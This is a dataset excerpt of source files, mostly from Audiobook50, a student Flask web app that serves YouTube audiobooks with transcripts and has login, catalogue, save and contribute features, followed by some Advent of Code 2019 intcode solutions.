"text": "# Audiobook50\n### https://audiobook50.herokuapp.com/\n### Description:\nAudiobook50 is a website where you can read or listen to audiobooks with transcripts\n\n### Build using:\n* HTML\n* CSS\n* Javascript\n* Flask\n\n### Deployment:\n* [heroku](https://audiobook50.herokuapp.com/)\n\n\n#### API\nIn order to get the transcript from youtube I used a python\nlibrary\n\nYoutube Transcript API\n[youtube-transcript-api](https://pypi.org/project/youtube-transcript-api/)\n\n\n### Run Yourself\n#### Clone repository \n* ```git clone https://github.com/ralflopez/Audiobook50.git```\n#### Make an environment variable\n* Window command: ```python -m venv <name>```\n#### Install dependencies\n* ```pip install -r requirements.txt```\n#### Run app\n* ```python app.py```\n"
},
{
"alpha_fraction": 0.4246987998485565,
"alphanum_fraction": 0.4487951695919037,
"avg_line_length": 26.75,
"blob_id": "53bf03d8c8e57113e4d29c192a834cb5aa5e5ad4",
"content_id": "262dc9aa3171bc0d4186b45b50fa12c31a00e1d8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 332,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 12,
"path": "/website/static/js/book/extra.js",
"repo_name": "ralflopez/Audiobook50",
"src_encoding": "UTF-8",
"text": "$(document).ready(function (){\n let scolling = false\n $(\"#find-current\").click(function (){\n if (!scolling) {\n scolling = true\n $('html').animate({\n scrollTop: $(\"#active\").offset().top\n }, 2000);\n setTimeout(() => scolling = false, 2000)\n }\n });\n});"
},
{
"alpha_fraction": 0.6846985816955566,
"alphanum_fraction": 0.687789797782898,
"avg_line_length": 23.923076629638672,
"blob_id": "5ae5ce203c7bc9d86a0a1ec2729f9cbc145abbe0",
"content_id": "1a413b8b15ded644a305cff23837247ca9665f53",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 647,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 26,
"path": "/website/__init__.py",
"repo_name": "ralflopez/Audiobook50",
"src_encoding": "UTF-8",
"text": "from flask import Flask\nfrom flask.helpers import url_for\nfrom flask_session import Session\nfrom .packages.SQL import SQL\nimport os\n\ndb = SQL(os.path.abspath('website/audiobook50.db'))\n\ndef create_app():\n app = Flask(__name__)\n app.config['SECRET_KEY'] = 'sdfsfsdfas'\n\n # configure session\n app.config['SESSION_PERMANENT'] = False\n app.config['SESSION_TYPE'] = 'filesystem'\n app.config['TEMPLATES_AUTO_RELOAD'] = True\n Session(app)\n\n # register routes\n from .views import views\n from .api import api\n\n app.register_blueprint(views, url_prefix='/')\n app.register_blueprint(api, url_prefix=\"/api\")\n\n return app"
},
{
"alpha_fraction": 0.6309983730316162,
"alphanum_fraction": 0.6309983730316162,
"avg_line_length": 23.849315643310547,
"blob_id": "e69b738fa3211e72b3e80b2a5767f90e539c7b99",
"content_id": "fa71999cd92ef9f5753e7af769d2088847ce47d6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1813,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 73,
"path": "/website/api.py",
"repo_name": "ralflopez/Audiobook50",
"src_encoding": "UTF-8",
"text": "from flask import Blueprint, request, jsonify, session\nfrom werkzeug.utils import redirect\nfrom . import db\nfrom .helpers import apology, login_required\n\napi = Blueprint('api', __name__)\n\[email protected]('/transcript')\n@login_required\ndef transcript():\n id = request.args.get('v')\n\n from .packages.youtube_data_api import getVideoTranscript\n transcript = getVideoTranscript(id)\n\n return jsonify(transcript)\n\[email protected]('/save', methods=['POST'])\n@login_required\ndef save():\n user_id = session.get('user_id')\n data = request.get_json()\n\n if not data:\n return apology('Unable to save file')\n\n if not user_id:\n return redirect('/login')\n \n # check if book exist\n rows = db.execute('SELECT title FROM books WHERE id = ?', data['v_id'])\n if not len(rows):\n return apology('Book not found')\n\n db.execute('INSERT INTO saves (user_id, book_id) VALUES (? , ?)', user_id, data['v_id'])\n\n return redirect('/profile')\n\n\[email protected]('/unsave', methods=['POST'])\n@login_required\ndef unsave():\n user_id = session.get('user_id')\n data = request.get_json()\n\n if not data:\n return apology('Unable to unsave file')\n\n if not user_id:\n return redirect('/login')\n \n # delete from db\n db.execute('DELETE FROM saves WHERE book_id = ? AND user_id = ?;', data['v_id'], user_id)\n\n return jsonify({'success': 'Unsaved'})\n\n\[email protected]('/delete', methods=['POST'])\n@login_required\ndef delete():\n user_id = session.get('user_id')\n data = request.get_json()\n\n if not data:\n return apology('Unable to delete file')\n\n if not user_id:\n return redirect('/login')\n \n # delete from db\n db.execute('DELETE FROM books WHERE id = ? AND contributor_id = ?;', data['v_id'], user_id)\n\n return jsonify({'success': 'Deleted'})"
},
{
"alpha_fraction": 0.493865042924881,
"alphanum_fraction": 0.699386477470398,
"avg_line_length": 16.157894134521484,
"blob_id": "28342e48adf6310b3fb6c6d2e2753fdd0ea8f0e5",
"content_id": "d22e8a56694b66e0508c5b7d54d85cfa4102e4bc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 326,
"license_type": "no_license",
"max_line_length": 29,
"num_lines": 19,
"path": "/requirements.txt",
"repo_name": "ralflopez/Audiobook50",
"src_encoding": "UTF-8",
"text": "cachelib==0.2.0\ncertifi==2021.5.30\nchardet==4.0.0\nclick==8.0.1\ncolorama==0.4.4\nFlask==2.0.1\nFlask-Login==0.5.0\nFlask-Session==0.4.0\ngreenlet==1.1.0\ngunicorn==20.1.0\nidna==2.10\nitsdangerous==2.0.1\nJinja2==3.0.1\nMarkupSafe==2.0.1\nrequests==2.25.1\nSQLAlchemy==1.4.20\nurllib3==1.26.6\nWerkzeug==2.0.1\nyoutube-transcript-api==0.4.1\n"
},
{
"alpha_fraction": 0.6985294222831726,
"alphanum_fraction": 0.7022058963775635,
"avg_line_length": 29.33333396911621,
"blob_id": "8934e00081bf9f702595fe815fedfa9ee000a74b",
"content_id": "daab16b95d87322545b9a4ecaca7fbb53d328213",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 272,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 9,
"path": "/website/packages/youtube_data_api/__init__.py",
"repo_name": "ralflopez/Audiobook50",
"src_encoding": "UTF-8",
"text": "from youtube_transcript_api import YouTubeTranscriptApi\n\ndef getVideoTranscript(video_id):\n try:\n yt_transcript = YouTubeTranscriptApi.get_transcript(video_id)\n except: \n yt_transcript = [{'start': 0, 'text': 'No Transcript'}]\n\n return yt_transcript"
},
{
"alpha_fraction": 0.6251714825630188,
"alphanum_fraction": 0.6267147064208984,
"avg_line_length": 29.86243438720703,
"blob_id": "4ae386d39dab71e7ec065070f09e8804464abb64",
"content_id": "3a93dae80d0d7b2db16fc2c0f66d440a6b018459",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5832,
"license_type": "no_license",
"max_line_length": 249,
"num_lines": 189,
"path": "/website/views.py",
"repo_name": "ralflopez/Audiobook50",
"src_encoding": "UTF-8",
"text": "from flask import Blueprint, render_template, session, request\nfrom werkzeug.utils import redirect\nfrom .helpers import login_required, apology\nfrom werkzeug.security import check_password_hash, generate_password_hash\nfrom . import db\n\nviews = Blueprint('views', __name__)\n\n\[email protected]('/')\ndef index():\n # from .packages.youtube_data_api import getVideoTranscript\n\n return render_template('index.html')\n\n\[email protected]('/book')\ndef book_invalid():\n return redirect('/')\n\n\[email protected]('/catalogue')\n@login_required\ndef catalogue():\n book_list = db.execute('SELECT books.id, title, name as author, books.contributor_id as contributor_id FROM books JOIN authors ON authors.id = books.author_id ORDER BY title;')\n print(book_list)\n return render_template('catalogue.html', book_list=book_list, user_id=session.get('user_id'))\n\n\[email protected]('/book/<v_id>')\n@login_required\ndef book(v_id):\n rows = db.execute('SELECT books.id, title, name as author FROM books JOIN authors ON authors.id = books.author_id WHERE books.id = ?', v_id)\n \n # no book found\n if not len(rows):\n return apology('Book not found')\n\n book_details = rows[0]\n return render_template('book.html', book_details=book_details)\n\n\[email protected]('/contribute', methods=['GET', 'POST'])\n@login_required\ndef contribute():\n if request.method == 'POST':\n user_id = session.get('user_id')\n\n title = request.form.get('title')\n author = request.form.get('author')\n url = request.form.get('yt-url')\n\n if not title or not author or not url:\n return apology('Please complete info')\n\n # get id from url\n try:\n start = url.index('?v=') + 3\n except:\n return apology('Invalid URL')\n\n try:\n end = url.index('&')\n except:\n end = len(url)\n\n id = url[start: end]\n # get author\n author_id_res = db.execute('SELECT id FROM authors WHERE name LIKE ? LIMIT 1;', f'%{author}%')\n if not len(author_id_res):\n db.execute('INSERT INTO authors (name) VALUES (?);', author)\n author_id_res = db.execute('SELECT id FROM authors WHERE name = ? LIMIT 1;', author)\n\n author_id = author_id_res[0]['id']\n\n # push to db\n try:\n db.execute('INSERT INTO books (id, title, author_id, contributor_id) VALUES (?, ?, ?, ?);', id, title, author_id, user_id)\n except: \n return apology('Book already exist')\n\n return redirect('/catalogue')\n\n else:\n return render_template('contribute.html')\n\n\[email protected]('/profile')\n@login_required\ndef profile():\n user_id = session.get('user_id')\n\n saves_list = db.execute('SELECT books.id, books.title, authors.name AS author, books.contributor_id FROM saves JOIN books ON books.id = saves.book_id JOIN authors on authors.id = books.author_id WHERE saves.user_id = ? 
ORDER BY title;', user_id)\n\n contribution_list = db.execute('SELECT books.id, books.title, authors.name AS author, books.contributor_id FROM books JOIN authors ON books.author_id = authors.id WHERE books.contributor_id = ?;', user_id)\n \n return render_template('profile.html', saves_list=saves_list, contribution_list=contribution_list, user_id=user_id)\n\n\n\[email protected]('/login', methods=['GET', 'POST'])\ndef login():\n\n if session.get('user_id'):\n return redirect('/')\n\n \"\"\"Log user in\"\"\"\n\n # Forget any user_id\n session.clear()\n\n # User reached route via POST (as by submitting a form via POST)\n if request.method == \"POST\":\n\n # Ensure username was submitted\n if not request.form.get(\"username\"):\n return apology(\"must provide username\")\n\n # Ensure password was submitted\n elif not request.form.get(\"password\"):\n return apology(\"must provide password\")\n\n # Query database for username\n rows = db.execute(\"SELECT * FROM users WHERE username = ?\", request.form.get(\"username\"))\n\n # Ensure username exists and password is correct\n if len(rows) != 1 or not check_password_hash(rows[0][\"hash\"], request.form.get(\"password\")):\n return apology(\"invalid username and/or password\")\n\n # Remember which user has logged in\n session[\"user_id\"] = rows[0][\"id\"]\n\n # Redirect user to home page\n return redirect(\"/\")\n\n # User reached route via GET (as by clicking a link or via redirect)\n else:\n return render_template(\"login.html\")\n\n\[email protected](\"/register\", methods=[\"GET\", \"POST\"])\ndef register():\n\n if session.get('user_id'):\n return redirect('/')\n\n \"\"\"Register user\"\"\"\n if request.method == 'POST':\n username = request.form.get('username')\n password = request.form.get('password')\n confirmation = request.form.get('confirmation')\n\n # error handling\n if not username:\n return apology('Must Enter Username')\n\n if not password:\n return apology('Must Enter Password')\n\n if not confirmation:\n return apology('Must Enter Password For Confirmation')\n\n if password != confirmation:\n return apology('Password Confirmation Doesn\\'t Match')\n\n # check if exist\n user = db.execute('SELECT * FROM users WHERE username = ?', username)\n if len(user) != 0:\n return apology('User already exist. Try logging in instead')\n\n # insert into db\n db.execute('INSERT INTO users (username, hash) VALUES (?, ?)', username, generate_password_hash(password))\n\n return redirect('/login')\n\n # get request\n else:\n return render_template('register.html')\n\n\[email protected](\"/logout\")\ndef logout():\n \"\"\"Log user out\"\"\"\n\n # Forget any user_id\n session.clear()\n\n # Redirect user to login form\n return redirect(\"/\")"
}
] | 10 |
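The SQL wrapper in this record returns rows as dictionaries by installing dict_factory as the sqlite3 row factory. That technique in isolation, as a self-contained sketch against an in-memory database (table shape borrowed from the users schema above):

```python
import sqlite3

# Row factory that turns each result row into a {column: value} dict,
# as in the SQL class above.
def dict_factory(cursor, row):
    return {col[0]: value for col, value in zip(cursor.description, row)}

conn = sqlite3.connect(':memory:')
conn.row_factory = dict_factory
conn.execute('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)')
conn.execute('INSERT INTO users (username) VALUES (?)', ('alice',))
print(conn.execute('SELECT * FROM users').fetchall())
# -> [{'id': 1, 'username': 'alice'}]
```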
mikhail/python-rightscale | https://github.com/mikhail/python-rightscale | aa859214f21210fb3ff6e1d9d7f5877fdfc14716 | f6889a3e5e8139750f5e4da63cdb82c5f57e6811 | 9de5b2a08e8b1ff4e31d200046e54ed11cc5242a | refs/heads/master | 2021-01-16T00:56:25.034743 | 2014-08-27T04:54:28 | 2014-08-27T04:54:28 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7051281929016113,
"alphanum_fraction": 0.7435897588729858,
"avg_line_length": 18.5,
"blob_id": "e7495636a513014e53a58942736a5a903566dfb9",
"content_id": "a3a4ed93edf32362f1d6ac626c373c99c6a97ada",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 78,
"license_type": "permissive",
"max_line_length": 34,
"num_lines": 4,
"path": "/rightscale/__init__.py",
"repo_name": "mikhail/python-rightscale",
"src_encoding": "UTF-8",
"text": "from .rightscale import RightScale\nfrom .commands import *\n\nVERSION = '0.1.0'\n"
},
{
"alpha_fraction": 0.6628788113594055,
"alphanum_fraction": 0.6628788113594055,
"avg_line_length": 23,
"blob_id": "9e108026fe6b2e5203171b7b829d82cff622343a",
"content_id": "d0131d7924c3371f1f8edf7a1737c6ba9f93b513",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 528,
"license_type": "permissive",
"max_line_length": 58,
"num_lines": 22,
"path": "/setup.py",
"repo_name": "mikhail/python-rightscale",
"src_encoding": "UTF-8",
"text": "try:\n from setuptools import setup\nexcept:\n from distutils.core import setup\n\nfrom rightscale import VERSION\n\npackages = ['rightscale']\nrequires = ['requests']\n\n\nsetup(name='python-rightscale',\n version=VERSION,\n description='Python wrapper for the Rightscale API',\n author='Brent Naylor',\n author_email='[email protected]',\n license='MIT',\n package_dir={'rightscale': 'rightscale'},\n url='https://github.com/brantai/python-rightscale',\n packages=packages,\n install_requires=requires,\n )\n"
}
] | 2 |
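setup.py above does `from rightscale import VERSION`, so installing the package requires its runtime imports to already work. A common alternative, sketched here rather than taken from the repo, reads the version string out of the source file without importing it:

```python
import re

# Pull VERSION out of rightscale/__init__.py without importing the package.
def read_version(path='rightscale/__init__.py'):
    with open(path) as f:
        match = re.search(r"VERSION\s*=\s*'([^']+)'", f.read())
    if match is None:
        raise RuntimeError('VERSION not found in ' + path)
    return match.group(1)

# setup(name='python-rightscale', version=read_version(), ...)
```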
tiffanyxiao/csc250-finalproject | https://github.com/tiffanyxiao/csc250-finalproject | ada60e56969b1cf721f68176dd6bd40f1e6cf4de | 24e9cde347e265de168e0404ce3ff1bd49c41e03 | 2c2f5e5e46eaf48dcc17ab607c17ee5ca1aeb6f5 | refs/heads/master | 2020-05-16T07:41:09.849213 | 2019-04-30T13:27:28 | 2019-04-30T13:27:28 | 182,884,179 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5779467821121216,
"alphanum_fraction": 0.5836501717567444,
"avg_line_length": 16.53333282470703,
"blob_id": "554134a3e04712160d3c18d3eee3404b883b41ed",
"content_id": "a54258147d2a2860e7f58c39f76d95bf2e0032f8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 526,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 30,
"path": "/test.py",
"repo_name": "tiffanyxiao/csc250-finalproject",
"src_encoding": "UTF-8",
"text": "import regex as re\nimport time\n\ndef match(test_str):\n regex_input = r'A(B|C+)+D'\n\n matches = re.finditer(regex_input, test_str)\n\n return matches\n\ndef printkey(matches):\n count = 0\n for match in matches:\n count +=1\n if count == 0:\n print(\"Match Not Found\")\n else:\n print(\"Match Found\")\n\ndef main():\n # time is in seconds\n start = time.time()\n text = input(\"Enter String to Match:\")\n key = match(text)\n end = time.time()\n printkey(key)\n print(end - start)\n\n\nmain()\n"
},
{
"alpha_fraction": 0.7349953651428223,
"alphanum_fraction": 0.7654662728309631,
"avg_line_length": 33.967742919921875,
"blob_id": "3925bcc5e4f26d01260a28722b3b1ca180b73e50",
"content_id": "717ae4dec13a02b7c95b013ee884fccb201c3cae",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1083,
"license_type": "no_license",
"max_line_length": 276,
"num_lines": 31,
"path": "/README.md",
"repo_name": "tiffanyxiao/csc250-finalproject",
"src_encoding": "UTF-8",
"text": "# csc250 final project\nFinal Project on Evil Regular Expressions for CSC 250 - Theory of Computation.\n\nIncludes:\n\n-Python regular expression matcher with regex = A(B|C+)+D\n\n-Javascript regular expression matcher (with regex = A(B|C+)+D) and pseudo email signup authenticator. \n\n-Html file (index.html) featuring explanation of project and paper the project was based on\n\nSummary: \n\nThe project (described in the html file) is a presentation of a paper detailing what ReDos-ing is. There are also programs to demonstrate programs that are vulnerable to simple ReDos-ing attempts in this repository. See html file for a video demonstrating this vulnerability. \n\nTo launch: \n\n-the demo: open test.py and then click on \"sign up here\" to go to vulnerable password field. Enter in your attempts to break the webpage! \n\n-the presentation (web page version [the original presentation was in powerpoint form]): open index.html file. \n\nColor scheme: \n#0d0829 - black\n#091358 - dark blue\n#6882a1 - light blue \n#b60002 - red\n#690308 - dark red\n\n\nCo-authors: Gin Chen and Lorraine Lyu\nDemo code by Tiffany Xiao"
}
] | 2 |
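The README above presents A(B|C+)+D as an evil regex: on an input like 'A' followed by many 'C's and no final 'D', the nested quantifiers give a backtracking engine exponentially many ways to partition the run of Cs before it can report failure. A timing sketch with the standard-library re module (the repo's test.py uses the third-party regex package, which mitigates some such cases):

```python
import re
import time

evil = re.compile(r'A(B|C+)+D')

for n in range(18, 25, 2):
    attack = 'A' + 'C' * n        # no trailing 'D', so matching must fail
    start = time.perf_counter()
    evil.search(attack)
    print(n, 'Cs ->', round(time.perf_counter() - start, 3), 's')
# Runtime roughly doubles with each extra 'C': catastrophic backtracking.
```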
chariskal/camera-calibration | https://github.com/chariskal/camera-calibration | acb96f538bc9b8b551358e91d4012e3029bedc66 | 64867cfae7036e8125a87fa541ebf372775d19c7 | c34ea00bcc01129cdd4a3af69bf8aea6aa43bf36 | refs/heads/main | 2023-03-10T08:50:10.618653 | 2021-02-22T22:11:55 | 2021-02-22T22:11:55 | 341,349,408 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6631016135215759,
"alphanum_fraction": 0.6957813501358032,
"avg_line_length": 36.42222213745117,
"blob_id": "a16b6fff11d1974e59be51f75591e783ef6340d3",
"content_id": "40b2efc0298e69d8a51b7e2ffb3c78237cfcb45a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1683,
"license_type": "no_license",
"max_line_length": 151,
"num_lines": 45,
"path": "/camera_calibration.py",
"repo_name": "chariskal/camera-calibration",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport cv2\nimport numpy as np\nimport os\nimport glob\n\n# Defining the dimensions of checkerboard\nCHECKERBOARD = (6,8)\ncriteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 30, 0.001)\n\nobjpoints = [] # vector that stores vectors of 3D points for each checkerboard image\nimgpoints = [] # vector that stores vectors of 2D points for each checkerboard image\n\n# Defining the world coordinates for 3D points\nobjp = np.zeros((1, CHECKERBOARD[0] * CHECKERBOARD[1], 3), np.float32)\nobjp[0,:,:2] = np.mgrid[0:CHECKERBOARD[0], 0:CHECKERBOARD[1]].T.reshape(-1, 2)\nprev_img_shape = None\n\nimages = glob.glob('./images/*.png') # Directory of checkboard images\n\nfor fname in images:\n img = cv2.imread(fname)\n gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY) # convert to grayscale\n # Find the chess board corners\n # If desired number of corners are found in the image then ret = true\n ret, corners = cv2.findChessboardCorners(gray, CHECKERBOARD, cv2.CALIB_CB_ADAPTIVE_THRESH + cv2.CALIB_CB_FAST_CHECK + cv2.CALIB_CB_NORMALIZE_IMAGE)\n\n if ret == True:\n objpoints.append(objp)\n # refining pixel coordinates for given 2d points.\n corners2 = cv2.cornerSubPix(gray, corners, (11,11),(-1,-1), criteria)\n imgpoints.append(corners2)\n # Draw and display the corners\n img = cv2.drawChessboardCorners(img, CHECKERBOARD, corners2, ret)\n \n #cv2.imshow('img',img)\n #cv2.waitKey(0)\n\ncv2.destroyAllWindows()\nh,w = img.shape[:2]\n\nret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(objpoints, imgpoints, gray.shape[::-1], None, None)\nfname = 'calibr_parameters.npz'\nnp.savez(fname, mtx=mtx, dist=dist)"
},
{
"alpha_fraction": 0.54923415184021,
"alphanum_fraction": 0.5638220310211182,
"avg_line_length": 27.5625,
"blob_id": "e242eb3ede77d0829a5799291634f3fa6149bb9d",
"content_id": "b19d6b1382327de91452bfda7cd856a2885fc8a6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1371,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 48,
"path": "/test_calibration.py",
"repo_name": "chariskal/camera-calibration",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport cv2\nimport numpy as np\nimport os\nimport glob\nif __name__ == '__main__':\n filepath = 'video.flv'\n\n npzfile = np.load('calibr_parameters.npz')\n mtxstr, diststr = npzfile.files\n mtx = npzfile[mtxstr]\n dist = npzfile[diststr]\n\n\n cap = cv2.VideoCapture(filepath)\n if not cap.isOpened():\n print(\"VideoCapture failed...\")\n else:\n print(\"Video opened! ...\") \n fps = cap.get(cv2.CAP_PROP_FPS)\n print(\"FPS:\", fps)\n\n ret, frame = cap.read() # Read first frame to get info about the resolution\n h,w = frame.shape[:2]\n newcameramtx, roi = cv2.getOptimalNewCameraMatrix(mtx,dist,(w,h),0,(w,h))\n x,y,w,h = roi\n out = cv2.VideoWriter('undistorted.avi', cv2.VideoWriter_fourcc('M', 'J', 'P', 'G'), 15, (w, h))\n\n dst = cv2.undistort(frame, mtx, dist, None, newcameramtx)\n dst = dst[y:y+h, x:x+w]\n out.write(dst)\n\n while cap.isOpened():\n ret, frame = cap.read()\n if np.shape(frame) == ():\n continue\n \n dst = cv2.undistort(frame, mtx, dist, None, newcameramtx)\n dst = dst[y:y+h, x:x+w]\n out.write(dst)\n #cv2.imshow(\"video\", dst)\n #k = cv2.waitKey(30) & 0xff # if 'Esc' is pressed then quit\n #if k == 27:\n # break\n\n cv2.destroyAllWindows()\n out.release()\n cap.release()\n"
},
{
"alpha_fraction": 0.8073089718818665,
"alphanum_fraction": 0.8073089718818665,
"avg_line_length": 49.16666793823242,
"blob_id": "b4d7eeffb971c9c569a3920fe61712c4aa1ce35f",
"content_id": "fd0ac07ca7806d32247fcb1da91d206490afa91b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 301,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 6,
"path": "/README.md",
"repo_name": "chariskal/camera-calibration",
"src_encoding": "UTF-8",
"text": "OpenCV python code for calibrating a camera (removing lens distortion).\nTested on an underwater BARLUS stainless steel camera\n\n\n\n\n"
}
] | 3 |
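camera_calibration.py stores the intrinsic matrix and distortion coefficients in calibr_parameters.npz, and test_calibration.py replays them frame by frame over a video. The same reload-and-undistort step for a single still image, sketched (the input file name is hypothetical):

```python
import cv2
import numpy as np

# Reload the saved calibration and undistort one image.
data = np.load('calibr_parameters.npz')
mtx, dist = data['mtx'], data['dist']

img = cv2.imread('images/sample.png')        # hypothetical test image
h, w = img.shape[:2]
new_mtx, roi = cv2.getOptimalNewCameraMatrix(mtx, dist, (w, h), 0, (w, h))
undistorted = cv2.undistort(img, mtx, dist, None, new_mtx)
x, y, rw, rh = roi                           # crop to the valid region
cv2.imwrite('undistorted.png', undistorted[y:y + rh, x:x + rw])
```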
PalkeshGoyal/red-Cloak | https://github.com/PalkeshGoyal/red-Cloak | ec148a25c67952b5247fd9c032c143dbaecd0579 | 05ae5c94cf0e457692318d427240839bb6477c65 | 5ac7ca9b8d87dd8a99d023bb382de539f39185fb | refs/heads/master | 2022-11-19T12:37:24.217141 | 2020-07-18T13:21:45 | 2020-07-18T13:21:45 | 280,659,236 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5529196858406067,
"alphanum_fraction": 0.614051103591919,
"avg_line_length": 30.84848403930664,
"blob_id": "9fe1c4a64f2df2ec2abb3244cb406d24babb6fee",
"content_id": "491dccf72965b439e2660c560830ddfd3ea04705",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1096,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 33,
"path": "/cloak.py",
"repo_name": "PalkeshGoyal/red-Cloak",
"src_encoding": "UTF-8",
"text": "import numpy as np\r\nimport cv2 as cv\r\n#import time\r\ncap = cv.VideoCapture(0, cv.CAP_DSHOW)\r\nbackground = 0\r\nfor i in range(30):\r\n ret , background = cap.read()\r\nwhile(cap.isOpened()):\r\n ret , img = cap.read()\r\n if not ret:\r\n break\r\n hsv = cv.cvtColor(img , cv.COLOR_BGR2HSV)\r\n lower_red = np.array([0,120,70])\r\n upper_red = np.array([10,255,255])\r\n mask1 = cv.inRange(hsv,lower_red,upper_red)\r\n \r\n lower_red = np.array([170,120,70])\r\n upper_red = np.array([180,255,255])\r\n mask2 = cv.inRange(hsv,lower_red,upper_red)\r\n \r\n mask1 = mask1 + mask2\r\n mask1 = cv.morphologyEx(mask1,cv.MORPH_OPEN,np.ones((3,3)),iterations = 2)\r\n mask1 = cv.morphologyEx(mask1,cv.MORPH_DILATE,np.ones((3,3)),iterations = 1)\r\n mask2= cv.bitwise_not(mask1)\r\n res1= cv.bitwise_and(background, background, mask=mask1)\r\n res2=cv.bitwise_and(img,img,mask=mask2)\r\n final_output= cv.addWeighted(res1, 1, res2, 1,0)\r\n cv.imshow(\"Eureka\",final_output)\r\n k = cv.waitKey(10)\r\n if( k == 27 ):\r\n break\r\ncap.release()\r\ncv.destroyAllWindows()\r\n \r\n \r\n"
}
] | 1 |
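cloak.py thresholds red twice because red hue wraps around the ends of OpenCV's 0–180 hue axis, then cleans the mask morphologically. That masking step in isolation, sketched for a single still frame ('frame.png' is a hypothetical input):

```python
import cv2 as cv
import numpy as np

img = cv.imread('frame.png')                 # hypothetical input frame
hsv = cv.cvtColor(img, cv.COLOR_BGR2HSV)
# Same thresholds as cloak.py: red occupies both ends of the hue range.
low = cv.inRange(hsv, np.array([0, 120, 70]), np.array([10, 255, 255]))
high = cv.inRange(hsv, np.array([170, 120, 70]), np.array([180, 255, 255]))
mask = cv.bitwise_or(low, high)
mask = cv.morphologyEx(mask, cv.MORPH_OPEN, np.ones((3, 3), np.uint8))
cv.imwrite('red_mask.png', mask)
```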
rossacheson/advent-of-code | https://github.com/rossacheson/advent-of-code | 9602531840629e34afb6611eae1bf16e262f2042 | ec0a8a7e46c761ddaf3b5462f697d3ca380ed901 | f0fd864bd1254ecda22f11396a2db8f932a1659a | refs/heads/main | 2023-01-14T18:59:18.395070 | 2020-11-11T01:12:30 | 2020-11-11T01:12:30 | 304,620,881 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5435540080070496,
"alphanum_fraction": 0.5707316994667053,
"avg_line_length": 24.64285659790039,
"blob_id": "9576e48f75bdfb65a345835039d67e4e680a828a",
"content_id": "0b12f4c441a39b63c252977f6c3956cb49a76c51",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1435,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 56,
"path": "/2019/2/2.py",
"repo_name": "rossacheson/advent-of-code",
"src_encoding": "UTF-8",
"text": "from typing import List\n\ninitial_memory: List[int]\nDESIRED_OUTPUT = 19690720\n\nwith open('2019/2/input.txt', mode='r') as file:\n input = file.read()\n initial_memory = [int(s) for s in input.split(',')]\n\n\ndef intcode_compute(noun:int, verb:int):\n program = initial_memory.copy()\n program[1] = noun\n program[2] = verb\n\n ## run the program on the intcode computer\n i = 0\n while True:\n result = -1\n opcode = program[i]\n if(opcode == 99):\n break\n elif(opcode == 1):\n result = program[program[i + 1]] + program[program[i + 2]]\n elif(opcode == 2):\n result = program[program[i + 1]] * program[program[i + 2]]\n\n try:\n program[program[i + 3]] = result\n except IndexError as e:\n print(e)\n\n i += 4\n\n return program[0]\n\n\ndef find_noun_verb_pair():\n for i in range(100):\n for j in range(100):\n result = intcode_compute(i, j)\n if(result == DESIRED_OUTPUT):\n return { 'noun': i, 'verb': j }\n\n\nnoun_verb_dict = find_noun_verb_pair()\n\nif(noun_verb_dict == None):\n raise Exception('Error: no combination resulted in the desired output of ' + DESIRED_OUTPUT)\n\nnoun = noun_verb_dict.get('noun', -1)\nverb = noun_verb_dict.get('verb', -1)\nprint('noun: ' + str(noun))\nprint('verb: ' + str(verb))\nfinal_answer = 100 * noun + verb\nprint('final answer: ' + str(final_answer))"
},
{
"alpha_fraction": 0.5461847186088562,
"alphanum_fraction": 0.6064257025718689,
"avg_line_length": 23.129032135009766,
"blob_id": "3eefa4e874f310fc8a9194dae1ce5cd81f43f7a8",
"content_id": "3a39e213ae63fa0eb4b11612af4e72739a973d99",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 747,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 31,
"path": "/2019/2/1.py",
"repo_name": "rossacheson/advent-of-code",
"src_encoding": "UTF-8",
